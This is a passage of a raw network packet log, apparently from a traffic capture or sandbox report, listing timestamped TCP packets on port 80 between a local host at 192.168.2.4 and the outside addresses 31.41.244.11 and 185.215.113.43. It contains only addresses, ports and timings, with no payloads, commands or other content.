Dec 22, 2024 02:16:16.302046061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.302078962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.302095890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.302113056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.302822113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.302872896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.302920103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.302953959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.302968979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.303003073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.303730965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.303791046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.303833008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.303867102 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.303884029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.303905964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.304647923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.304698944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.304698944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.304737091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.304738998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.304781914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.305493116 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.305541992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.305612087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.305645943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.305658102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.305689096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.309624910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.309722900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.309848070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.309880972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.309890032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.309921980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.309993029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.310048103 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.310125113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.310158014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.310170889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.310199976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.310997963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.311059952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:18.576239109 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:18.576600075 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:18.699038029 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:18.699084044 CET	80	49785	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:18.699122906 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:18.699243069 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:18.699363947 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:18.818932056 CET	80	49785	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:20.050513029 CET	80	49785	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:20.050714970 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:20.232331991 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:20.232342958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:20.352005005 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:20.352094889 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:20.352312088 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:20.352385998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:20.352437019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:20.472143888 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.680917025 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.680958986 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681019068 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681018114 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681051016 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681057930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681097031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681107998 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681149006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681190968 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681245089 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681246042 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681282997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681288004 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681349039 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681526899 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681562901 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.681575060 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.681615114 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.800932884 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.800957918 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.801022053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.805033922 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.805372000 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.805440903 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.873167038 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.873406887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.873471022 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.877463102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.877571106 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.877629042 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.885591984 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.885647058 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.885797977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.885797977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.894154072 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.894177914 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.894211054 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.894233942 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.902679920 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.902704000 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.902785063 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.911324024 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.911349058 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.911374092 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.911405087 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.919440031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.919465065 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.919490099 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.919502974 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.927553892 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.927604914 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.927655935 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.927699089 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.936038971 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.936091900 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.936372042 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.936418056 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.944859028 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.944884062 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.944909096 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.944926977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.951872110 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.951917887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.951920986 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.951957941 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.958468914 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.958496094 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:21.958523035 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:21.958544970 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.065713882 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.065735102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.065771103 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.065792084 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.067890882 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.067934990 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.068789005 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.068829060 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.068875074 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.068914890 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.073550940 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.073600054 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.073643923 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.073688984 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.077264071 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.077325106 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.077430964 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.077476025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.081967115 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.082026958 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.082161903 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.082210064 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.086692095 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.086738110 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.086879969 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.086920023 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.091372967 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.091417074 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.091694117 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.091738939 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.096071959 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.096096039 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.096127987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.096138000 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.100605965 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.100632906 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.100657940 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.100672007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.105081081 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.105107069 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.105144978 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.105357885 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.109668970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.109695911 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.109730959 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.109743118 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.113828897 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.113888979 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.113903999 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.113979101 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.118491888 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.118516922 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.118539095 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.118560076 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.122869968 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.122895956 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.122931004 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.122944117 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.127223015 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.127326012 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.127355099 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.127409935 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.131874084 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.131900072 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.131927013 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.131943941 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.136168003 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.136194944 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.136348963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.140609026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.140680075 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.140698910 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.140769958 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.145091057 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.145139933 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.145164013 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.145201921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.149585009 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.149631977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.149878979 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.149923086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.154032946 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.154077053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.154248953 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.154289961 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.158535957 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.158580065 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.158622026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.158663988 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.163017988 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.163074017 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.163084984 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.163150072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.187398911 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.187453032 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.187673092 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.258450985 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.258538961 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.258539915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.258591890 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.260210991 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.260272980 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.260345936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.260399103 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.263717890 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.263772011 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.263911009 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.263967991 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.267441034 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.267499924 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.267527103 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.267574072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.270298004 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.270355940 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.270755053 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.270812035 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.274425983 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.274467945 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.274485111 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.274523020 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.277163982 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.277235031 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.277287006 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.277337074 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.280872107 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.280909061 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.280930042 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.280961990 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.284132004 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.284203053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.284296989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.284395933 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.287564993 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.287622929 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.287633896 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.287669897 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.290998936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.291076899 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.291177988 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.291229963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.294579029 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.294648886 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.294751883 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.294851065 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.297895908 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.297977924 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.298063040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.298115015 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.301058054 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.301130056 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.301629066 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.301680088 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.304244041 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.304297924 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.304477930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.304532051 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.307780981 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.307837963 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.307848930 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.307889938 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.310918093 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.310971975 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.310980082 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.311024904 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.313828945 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.313867092 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.313873053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.313910007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.317075968 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.317115068 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.317130089 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.317159891 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.318857908 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.318909883 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.318911076 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.318955898 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.320400953 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.320449114 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.320513010 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.320559978 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.322148085 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.322202921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.322268963 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.322314024 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.323913097 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.323961973 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.324019909 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.324069977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.325702906 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.325777054 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.325781107 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.325823069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.327822924 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.327877998 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.327882051 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.327925920 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.329355001 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.329416037 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.329447031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.329497099 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.330992937 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.331048012 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.331195116 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.331247091 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.332782984 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.332838058 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.332901955 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.332986116 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.334528923 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.334580898 CET	49787	80	192.168.2.4	31.41.244.11
